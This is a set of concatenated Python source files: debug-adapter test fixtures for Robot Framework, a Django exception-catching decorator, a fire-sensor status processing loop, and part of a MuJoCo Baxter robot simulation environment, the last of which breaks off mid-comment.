if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robotframework-lsp-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
return initialize_response
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
self.write(ConfigurationDoneRequest())
def step_in(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInResponse
arguments = StepInArguments(threadId=thread_id)
self.write(StepInRequest(arguments))
self.read(StepInResponse)
def step_next(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextResponse
arguments = NextArguments(threadId=thread_id)
self.write(NextRequest(arguments))
self.read(NextResponse)
def step_out(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutResponse
arguments = StepOutArguments(threadId=thread_id)
self.write(StepOutRequest(arguments))
self.read(StepOutResponse)
def continue_event(self, thread_id, accept_terminated=False):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import TerminatedEvent
arguments = ContinueArguments(thread_id)
self.write(ContinueRequest(arguments))
expected = [ContinueResponse]
if accept_terminated:
expected.append(TerminatedEvent)
return self.read(expect_class=tuple(expected))
def launch(
self,
target,
debug=True,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
env: Optional[dict] = None,
make_suite: Optional[bool] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.basic import as_str
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ProcessEvent
launch_args = LaunchRequestArguments(
__sessionId="some_id",
noDebug=not debug,
target=target,
terminal=terminal,
env=env,
cwd=self.cwd,
suiteTarget=self.suite_target,
)
if args:
launch_args.kwargs["args"] = args
if make_suite is not None:
launch_args.kwargs["makeSuite"] = make_suite
self.write(LaunchRequest(launch_args))
if terminal == "external":
run_in_terminal_request = self.read(RunInTerminalRequest)
external_env = os.environ.copy()
for key, val in run_in_terminal_request.arguments.env.to_dict().items():
external_env[as_str(key)] = as_str(val)
cwd = run_in_terminal_request.arguments.cwd
popen_args = run_in_terminal_request.arguments.args
subprocess.Popen(
popen_args, cwd=cwd, env=external_env, shell=sys.platform == "win32"
)
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
self.read((ProcessEvent, InitializedEvent))
self.read((ProcessEvent, InitializedEvent))
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines, line_to_kwargs={}):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(
line=line, **line_to_kwargs.get(line, {})
).to_dict()
for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def set_exception_breakpoints(self, filters):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsResponse,
)
self.write(
SetExceptionBreakpointsRequest(
SetExceptionBreakpointsArguments(filters=filters)
)
)
response = self.read(SetExceptionBreakpointsResponse)
assert response.success
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
def get_stack_as_json_hit(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
StackTraceArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StackTraceRequest
stack_trace_request = self.write(
StackTraceRequest(StackTraceArguments(threadId=thread_id))
)
# : :type stack_trace_response: StackTraceResponse
# : :type stack_trace_response_body: StackTraceResponseBody
# : :type stack_frame: StackFrame
stack_trace_response = self.wait_for_response(stack_trace_request)
stack_trace_response_body = stack_trace_response.body
assert len(stack_trace_response_body.stackFrames) > 0
stack_frame = next(iter(stack_trace_response_body.stackFrames))
return _JsonHit(
thread_id=thread_id,
frame_id=stack_frame["id"],
stack_trace_response=stack_trace_response,
)
def wait_for_thread_stopped(
self, reason="breakpoint", line=None, file=None, name=None
):
"""
:param file:
utf-8 bytes encoded file or unicode
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StoppedEvent
stopped_event = self.read(StoppedEvent)
assert stopped_event.body.reason == reason
json_hit = self.get_stack_as_json_hit(stopped_event.body.threadId)
if file is not None:
path = json_hit.stack_trace_response.body.stackFrames[0]["source"]["path"]
if not path.replace("\\", "/").endswith(file.replace("\\", "/")):
raise AssertionError("Expected path: %s to end with: %s" % (path, file))
if name is not None:
assert json_hit.stack_trace_response.body.stackFrames[0]["name"] == name
if line is not None:
found_line = json_hit.stack_trace_response.body.stackFrames[0]["line"]
if not isinstance(line, (tuple, list)):
line = [line]
assert found_line in line, "Expect to break at line: %s. Found: %s" % (
line,
found_line,
)
return json_hit
def get_line_index_with_content(self, line_content, filename=None):
"""
:return the line index which has the given content (1-based).
"""
if filename is None:
filename = self.target
with open(filename, "r", encoding="utf-8") as stream:
for i_line, line in enumerate(stream):
if line_content in line:
return i_line + 1
raise AssertionError("Did not find: %s in %s" % (line_content, filename))
def get_name_to_scope(self, frame_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Scope
scopes_request = self.write(ScopesRequest(ScopesArguments(frame_id)))
scopes_response = self.wait_for_response(scopes_request)
scopes = scopes_response.body.scopes
name_to_scopes = dict((scope["name"], Scope(**scope)) for scope in scopes)
assert len(scopes) == 3
assert sorted(name_to_scopes.keys()) == ["Arguments", "Builtins", "Variables"]
assert name_to_scopes["Arguments"].presentationHint == "locals"
return name_to_scopes
def get_name_to_var(self, variables_reference: int) -> Dict[str, "Variable"]:
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
variables_response = self.get_variables_response(variables_reference)
return dict(
(variable["name"], Variable(**variable))
for variable in variables_response.body.variables
)
def get_arguments_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Arguments"].variablesReference)
def get_variables_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Variables"].variablesReference)
def get_builtins_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Builtins"].variablesReference)
def get_variables_response(self, variables_reference, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import VariablesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
VariablesArguments,
)
variables_request = self.write(
VariablesRequest(VariablesArguments(variables_reference, format=fmt))
)
variables_response = self.wait_for_response(variables_request)
assert variables_response.success == success
return variables_response
def evaluate(self, expression, frameId=None, context=None, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateArguments
eval_request = self.write(
EvaluateRequest(
EvaluateArguments(
expression, frameId=frameId, context=context, format=fmt
)
)
)
eval_response = self.wait_for_response(eval_request)
assert (
eval_response.success == success
), "Expected success to be: %s (found: %s).\nMessage:\n%s" % (
success,
eval_response.success,
eval_response.to_dict(),
)
return eval_response
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
class RunRobotThread(threading.Thread):
def __init__(self, dap_logs_dir):
threading.Thread.__init__(self)
self.target = None
self.dap_logs_dir = dap_logs_dir
self.result_code = None
self.result_event = threading.Event()
def run(self):
import robot # type: ignore
code = robot.run_cli(
[
"--outputdir=%s" % (self.dap_logs_dir,),
"--listener=robotframework_debug_adapter.listeners.DebugListener",
"--listener=robotframework_debug_adapter.listeners.DebugListenerV2",
self.target,
],
exit=False,
)
self.result_code = code
def run_target(self, target):
self.target = target
self.start()
@pytest.fixture
def robot_thread(dap_logs_dir):
"""
Fixture for interacting with the debugger api through a thread.
"""
t = RunRobotThread(dap_logs_dir)
yield t
dbg_wait_for(
lambda: t.result_code is not None,
msg="Robot execution did not finish properly.",
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
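# A hedged sketch of a test driving these fixtures (the .robot file name and
# breakpoint content below are made up for illustration):
#
#     def test_simple_breakpoint(debugger_api):
#         target = debugger_api.get_dap_case_file('case_log.robot')
#         debugger_api.target = target
#         debugger_api.initialize()
#         debugger_api.launch(target, debug=True)
#         line = debugger_api.get_line_index_with_content('Log    Something')
#         debugger_api.set_breakpoints(target, line)
#         debugger_api.configuration_done()
#         json_hit = debugger_api.wait_for_thread_stopped(line=line)
#         debugger_api.continue_event(json_hit.thread_id, accept_terminated=True)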
|
decorator_util.py
|
# -*- coding: utf-8 -*-
# Decorator utilities module
import functools
import logging
import threading
import time
from common_util import response_json
from utils.common_util import get_except
logger = logging.getLogger('django')
def myasync(func):
"""
实现函数异步执行
:param param1: this is a first param
:param param2: this is a second param
:returns: 返回json格式的异常到前台
:raises keyError: raises an exception
@author: jhuang
@time:08/02/2018
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
my_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
my_thread.start()
return wrapper
def view_except(error_code=99):
"""
装饰器,视图异常捕获
:param param1: this is a first param
:param param2: this is a second param
:returns: 返回json格式的异常到前台
:raises keyError: raises an exception
@author: jhuang
@time:08/02/2018
"""
def wrapper(func):
def inner_wrapper(*args, **kwargs):
try:
start_time = time.time()
                ret = func(*args, **kwargs)
                # logger.debug('Function (%s) took: %s' % (__name__, time.time() - start_time))
                print('Function (%s) took (s): %s' % (func.__name__, time.time() - start_time))
return ret
except Exception as e:
# pass
logger.exception('view_except')
return response_json(get_except(e), error_code=error_code)
# re-raise the exception
raise
return inner_wrapper
return wrapper
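# Usage sketch (the view below is hypothetical; `request` follows the Django
# view signature this project appears to target):
#
#     @view_except(error_code=99)
#     def my_view(request):
#         return response_json({'ok': True})
#
#     @myasync
#     def send_report_email(user_id):
#         ...  # runs in a background thread; the caller does not wait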
|
objects_processing.py
|
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
from app.models import Object, ObjectStatusJob, Sensor, SensorStatusJob, SensorStatusSituation, ObjectStatusSituation, \
Report
from app.notifications import send_notification, send_notification_emergency
texts = {
'off': 'The FSafe system for the object \"{}\" has been disabled.\n\n'
'Go to <a href=\"https://fsafe.yegoryakubovich.com/account/state/{}\">State page</a> for details',
    'defect': 'Sensors of object \"{}\" have a defect.\n\n'
'Go to <a href=\"https://fsafe.yegoryakubovich.com/account/state/{}\">State page</a> for details',
'fire': 'Информация в данном сообщении является недостоверной. Сенсорами на объекте "{}" в комнате "{}"'
'был обнаружен пожар!\n\nМы уведомили экстренные службы',
'warning': 'Ситуация переведена в статус предупреждения. Будьте аккуратны!',
'stable': 'Ситуация переведена в статус стабильно.',
'fire_emergency': 'Информация в данном сообщении является недостоверной. Автоматический звонок системой Fire Safe!'
'\n\nИзвещателями был замечен пожар по адресу "{}". Комната: {}.',
}
def objects_processing():
for obj in Object.select():
status_job_init = obj.status_job
status_situation_init = obj.status_situation
obj_sensors = [s for s in Sensor.select().where(Sensor.object == obj)]
if not obj_sensors:
continue
obj_sensors_j = [s.status_job for s in obj_sensors]
obj_sensors_s = [s.status_situation for s in obj_sensors]
count_on = obj_sensors_j.count(SensorStatusJob.on)
count_off = obj_sensors_j.count(SensorStatusJob.off)
count_broken = obj_sensors_j.count(SensorStatusJob.broken)
count_discharged = obj_sensors_j.count(SensorStatusJob.discharged)
if count_on == len(obj_sensors):
obj.status_job = ObjectStatusJob.on
elif len(obj_sensors) == count_off + count_broken + count_discharged:
obj.status_job = ObjectStatusJob.off
else:
obj.status_job = ObjectStatusJob.defect
count_null = obj_sensors_s.count(SensorStatusSituation.null)
count_fire = obj_sensors_s.count(SensorStatusSituation.fire)
count_warning = obj_sensors_s.count(SensorStatusSituation.warning)
if count_null == len(obj_sensors):
obj.status_situation = ObjectStatusSituation.null
elif count_fire:
obj.status_situation = ObjectStatusSituation.fire
elif count_warning:
obj.status_situation = ObjectStatusSituation.warning
else:
obj.status_situation = ObjectStatusSituation.stable
obj.save()
if status_job_init != obj.status_job:
# any => off
if obj.status_job == ObjectStatusJob.off:
send_notification(account=obj.account,
notification=texts['off'].format(obj.name, obj.id))
# any => defect
elif obj.status_job == ObjectStatusJob.defect:
send_notification(account=obj.account,
notification=texts['defect'].format(obj.name, obj.id))
if status_situation_init != obj.status_situation:
# fire, call+emergency
if obj.status_situation == ObjectStatusSituation.fire:
sensor_fire = Sensor.get_or_none((Sensor.object == obj)
& (Sensor.status_situation == SensorStatusSituation.fire))
send_notification(account=obj.account,
notification=texts['fire'].format(obj.name, sensor_fire.description), call=True)
send_notification_emergency(notification=texts['fire_emergency']
.format(obj.address, sensor_fire.description))
# warning
elif obj.status_situation == ObjectStatusSituation.warning:
send_notification(account=obj.account, notification=texts['warning'])
# warning => stable
elif obj.status_situation == ObjectStatusSituation.stable \
and status_situation_init == SensorStatusSituation.warning:
send_notification(account=obj.account, notification=texts['stable'])
def sensors_processing():
for sensor in Sensor.select():
request = Report.select().where(Report.sensor == sensor).limit(1).order_by(Report.datetime.desc())
report_last = [r for r in request]
if report_last:
report = report_last[0]
time_limited = datetime.now() - timedelta(minutes=3)
if report.datetime <= time_limited:
if sensor.status_situation in [SensorStatusSituation.fire, SensorStatusSituation.warning]:
sensor.status_job = SensorStatusJob.broken
elif sensor.battery <= 15:
sensor.status_job = SensorStatusJob.discharged
sensor.status_situation = SensorStatusSituation.null
else:
sensor.status_job = SensorStatusJob.off
sensor.status_situation = SensorStatusSituation.null
else:
sensor.status_job = SensorStatusJob.off
sensor.save()
def processing():
while True:
try:
objects_processing()
sensors_processing()
sleep(5)
except Exception as e:
print(e)
def create_processing():
Thread(target=processing, args=()).start()
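# Intended wiring (a sketch; the real entry point lives elsewhere in the app):
# create_processing() is called once at startup, after which the background
# loop re-evaluates every object and sensor roughly every five seconds.
#
#     from app.objects_processing import create_processing  # hypothetical path
#     create_processing()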
|
baxter_mjc_env.py
|
# import matplotlib as mpl
# mpl.use('Qt4Agg')
import matplotlib.pyplot as plt
import numpy as np
import os
from threading import Thread
import time
import traceback
import sys
import xml.etree.ElementTree as xml
from tkinter import TclError
import pybullet as P
from dm_control.mujoco import Physics
from dm_control.rl.control import PhysicsError
from dm_control.viewer import runtime
from dm_control.viewer import user_input
from dm_control.viewer import util
from gym import spaces
from gym.core import Env
import opentamp
from opentamp.envs import MJCEnv
from opentamp.util_classes.ik_controller import BaxterIKController
from opentamp.util_classes.mjc_xml_utils import *
from opentamp.util_classes import transform_utils as T
from core.util_classes.robots import *
BASE_VEL_XML = os.getcwd() + '/opentamp'+'/robot_info/baxter_model.xml'
# ENV_XML = os.getcwd() + '/opentamp'+'/robot_info/current_baxter_env.xml'
SPECIFIC_ENV_XML = os.getcwd() + '/opentamp'+'/local/current_baxter_{0}.xml'
MUJOCO_JOINT_ORDER = ['right_s0', 'right_s1', 'right_e0', 'right_e1', 'right_w0', 'right_w1', 'right_w2', 'right_gripper_l_finger_joint', 'right_gripper_r_finger_joint',\
'left_s0', 'left_s1', 'left_e0', 'left_e1', 'left_w0', 'left_w1', 'left_w2', 'left_gripper_l_finger_joint', 'left_gripper_r_finger_joint']
NO_CLOTH = 0
NO_FOLD = 1
ONE_FOLD = 2
TWO_FOLD = 3
WIDTH_GRASP = 4
LENGTH_GRASP = 5
TWO_GRASP = 6
HALF_WIDTH_GRASP = 7
HALF_LENGTH_GRASP = 8
TWIST_FOLD = 9
RIGHT_REACHABLE = 10
LEFT_REACHABLE = 11
IN_RIGHT_GRIPPER = 12
IN_LEFT_GRIPPER = 13
LEFT_FOLD_ON_TOP = 14
RIGHT_FOLD_ON_TOP = 15
BAXTER_GAINS = {
'left_s0': (5000., 0.01, 2.5),
'left_s1': (5000., 50., 50.),
'left_e0': (4000., 15., 1.),
'left_e1': (1500, 30, 1.),
'left_w0': (500, 10, 0.01),
'left_w1': (500, 0.1, 0.01),
'left_w2': (1000, 0.1, 0.01),
'left_gripper_l_finger_joint': (1000, 0.1, 0.01),
'left_gripper_r_finger_joint': (1000, 0.1, 0.01),
'right_s0': (5000., 0.01, 2.5),
'right_s1': (5000., 50., 50.),
'right_e0': (4000., 15., 1.),
'right_e1': (1500, 30, 1.),
'right_w0': (500, 10, 0.01),
'right_w1': (500, 0.1, 0.01),
'right_w2': (1000, 0.1, 0.01),
'right_gripper_l_finger_joint': (1000, 0.1, 0.01),
'right_gripper_r_finger_joint': (1000, 0.1, 0.01),
}
ERROR_COEFF = 1e2
OPEN_VAL = 50
CLOSE_VAL = -50
_MAX_FRONTBUFFER_SIZE = 2048
_CAM_WIDTH = 200
_CAM_HEIGHT = 150
GRASP_THRESHOLD = np.array([0.05, 0.05, 0.025]) # np.array([0.01, 0.01, 0.03])
# MJC_TIME_DELTA = 0.002
# MJC_DELTAS_PER_STEP = int(1. // MJC_TIME_DELTA)
N_CONTACT_LIMIT = 12
# START_EE = [0.6, -0.5, 0.7, 0, 0, 1, 0, 0.6, 0.5, 0.7, 0, 0, 1, 0]
# START_EE = [0.6, -0.5, 0.9, 0, 0, 1, 0, 0.6, 0.5, 0.9, 0, 0, 1, 0]
START_EE = [0.6, -0.4, 0.9, 0, 1, 0, 0, 0.6, 0.4, 0.9, 0, 1, 0, 0]
DOWN_QUAT = [0, 0, 1, 0]
ALT_DOWN_QUAT = [0, 0.535, 0.845, 0]
CTRL_MODES = ['joint_angle', 'end_effector', 'end_effector_pos', 'discrete_pos', 'discrete']
DISCRETE_DISP = 0.02 # How far to move for each discrete action choice
class BaxterMJCEnv(MJCEnv):
# metadata = {'render.modes': ['human', 'rgb_array', 'depth'], 'video.frames_per_second': 67}
# def __init__(self, mode='end_effector', obs_include=[], items=[], include_files=[], include_items=[], im_dims=(_CAM_WIDTH, _CAM_HEIGHT), sim_freq=25, timestep=0.002, max_iter=250, view=False):
# assert mode in CTRL_MODES, 'Env mode must be one of {0}'.format(CTRL_MODES)
# self.ctrl_mode = mode
# self.active = True
# self.cur_time = 0.
# self.prev_time = 0.
# self.timestep = timestep
# self.sim_freq = sim_freq
# self.use_viewer = view
# self.use_glew = 'MUJOCO_GL' not in os.environ or os.environ['MUJOCO_GL'] != 'osmesa'
# self.obs_include = obs_include
# self._joint_map_cache = {}
# self._ind_cache = {}
# self.im_wid, self.im_height = im_dims
# self.items = items
# self._item_map = {item[0]: item for item in items}
# self.include_files = include_files
# self.include_items = include_items
# self._set_obs_info(obs_include)
# self._load_model()
# self._init_control_info()
# self._max_iter = max_iter
# self._cur_iter = 0
# if view:
# self._launch_viewer(_CAM_WIDTH, _CAM_HEIGHT)
# else:
# self._viewer = None
def _init_control_info(self):
self.ctrl_data = {}
for joint in BAXTER_GAINS:
self.ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
self.ee_ctrl_data = {}
for joint in BAXTER_GAINS:
self.ee_ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
if not P.getConnectionInfo()['isConnected']:
P.connect(P.DIRECT)
self.geom = Baxter()
self.geom.setup()
self._jnt_inds = {}
for key, jnts in self.geom.jnt_names.items():
self._jnt_inds[key] = [self.physics.model.name2id(jnt, 'joint') for jnt in jnts]
# Start joints with grippers pointing downward
self.physics.data.qpos[1:8] = self._calc_ik(START_EE[:3], START_EE[3:7], 'right', False)
self.physics.data.qpos[10:17] = self._calc_ik(START_EE[7:10], START_EE[10:14], 'left', False)
self.physics.forward()
self.action_inds = {
('baxter', 'rArmPose'): np.array(list(range(7))),
('baxter', 'rGripper'): np.array([7]),
('baxter', 'lArmPose'): np.array(list(range(8, 15))),
('baxter', 'lGripper'): np.array([15]),
}
def _load_model(self):
xmlpath = SPECIFIC_ENV_XML.format(self.xmlid)
generate_xml(BASE_VEL_XML, xmlpath, self.items, self.include_files, self.include_items, timestep=self.timestep)
self.physics = Physics.from_xml_path(xmlpath)
# def _launch_viewer(self, width, height, title='Main'):
# self._matplot_view_thread = None
# if self.use_glew:
# self._renderer = renderer.NullRenderer()
# self._render_surface = None
# self._viewport = renderer.Viewport(width, height)
# self._window = gui.RenderWindow(width, height, title)
# self._viewer = viewer.Viewer(
# self._viewport, self._window.mouse, self._window.keyboard)
# self._viewer_layout = views.ViewportLayout()
# self._viewer.render()
# else:
# self._viewer = None
# self._matplot_im = None
# self._run_matplot_view()
# def _reload_viewer(self):
# if self._viewer is None or not self.use_glew: return
# if self._render_surface:
# self._render_surface.free()
# if self._renderer:
# self._renderer.release()
# self._render_surface = render.Renderer(
# max_width=_MAX_FRONTBUFFER_SIZE, max_height=_MAX_FRONTBUFFER_SIZE)
# self._renderer = renderer.OffScreenRenderer(
# self.physics.model, self._render_surface)
# self._renderer.components += self._viewer_layout
# self._viewer.initialize(
# self.physics, self._renderer, touchpad=False)
# self._viewer.zoom_to_scene()
# def _render_viewer(self, pixels):
# if self.use_glew:
# with self._window._context.make_current() as ctx:
# ctx.call(
# self._window._update_gui_on_render_thread, self._window._context.window, pixels)
# self._window._mouse.process_events()
# self._window._keyboard.process_events()
# else:
# if self._matplot_im is not None:
# self._matplot_im.set_data(pixels)
# plt.draw()
# def _run_matplot_view(self):
# self._matplot_view_thread = Thread(target=self._launch_matplot_view)
# self._matplot_view_thread.daemon = True
# self._matplot_view_thread.start()
# def _launch_matplot_view(self):
# try:
# self._matplot_im = plt.imshow(self.render(view=False))
# plt.show()
# except TclError:
# print('\nCould not find display to launch viewer (this does not affect the ability to render images)\n')
def _set_obs_info(self, obs_include):
self._obs_inds = {}
self._obs_shape = {}
ind = 0
if 'overhead_image' in obs_include or not len(obs_include):
self._obs_inds['overhead_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['overhead_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'forward_image' in obs_include or not len(obs_include):
self._obs_inds['forward_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['forward_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'right_image' in obs_include or not len(obs_include):
self._obs_inds['right_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['right_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'left_image' in obs_include or not len(obs_include):
self._obs_inds['left_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['left_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'joints' in obs_include or not len(obs_include):
self._obs_inds['joints'] = (ind, ind+18)
self._obs_shape['joints'] = (18,)
ind += 18
if 'end_effector' in obs_include or not len(obs_include):
self._obs_inds['end_effector'] = (ind, ind+16)
self._obs_shape['end_effector'] = (16,)
ind += 16
for item, xml, info in self.items:
if item in obs_include or not len(obs_include):
self._obs_inds[item] = (ind, ind+3) # Only store 3d Position
self._obs_shape[item] = (3,)
ind += 3
self.dO = ind
self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(ind,), dtype='float32')
return ind
def get_obs(self, obs_include=None, view=False):
obs = np.zeros(self.dO)
if obs_include is None:
obs_include = self.obs_include
if self.load_render:
if not len(obs_include) or 'overhead_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=0, view=view)
view = False
inds = self._obs_inds['overhead_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'forward_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=1, view=view)
view = False
inds = self._obs_inds['forward_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'right_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=2, view=view)
view = False
inds = self._obs_inds['right_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'left_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=3, view=view)
view = False
inds = self._obs_inds['left_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'joints' in obs_include:
jnts = self.get_joint_angles()
inds = self._obs_inds['joints']
obs[inds[0]:inds[1]] = jnts
if not len(obs_include) or 'end_effector' in obs_include:
grip_jnts = self.get_gripper_joint_angles()
inds = self._obs_inds['end_effector']
obs[inds[0]:inds[1]] = np.r_[self.get_right_ee_pos(),
self.get_right_ee_rot(),
grip_jnts[0],
self.get_left_ee_pos(),
self.get_left_ee_rot(),
grip_jnts[1]]
for item in self.items:
if not len(obs_include) or item[0] in obs_include:
inds = self._obs_inds[item[0]]
obs[inds[0]:inds[1]] = self.get_item_pos(item[0])
return np.array(obs)
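# Example (illustrative, assuming env is a BaxterMJCEnv instance and render observations
# were registered in _set_obs_info): recovering a camera image from the flat observation vector.
# obs = env.get_obs()
# lo, hi = env._obs_inds['forward_image']
# img = obs[lo:hi].reshape(env._obs_shape['forward_image'])   # (im_height, im_wid, 3)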
# def get_obs_types(self):
# return self._obs_inds.keys()
# def get_obs_inds(self, obs_type):
# if obs_type not in self._obs_inds:
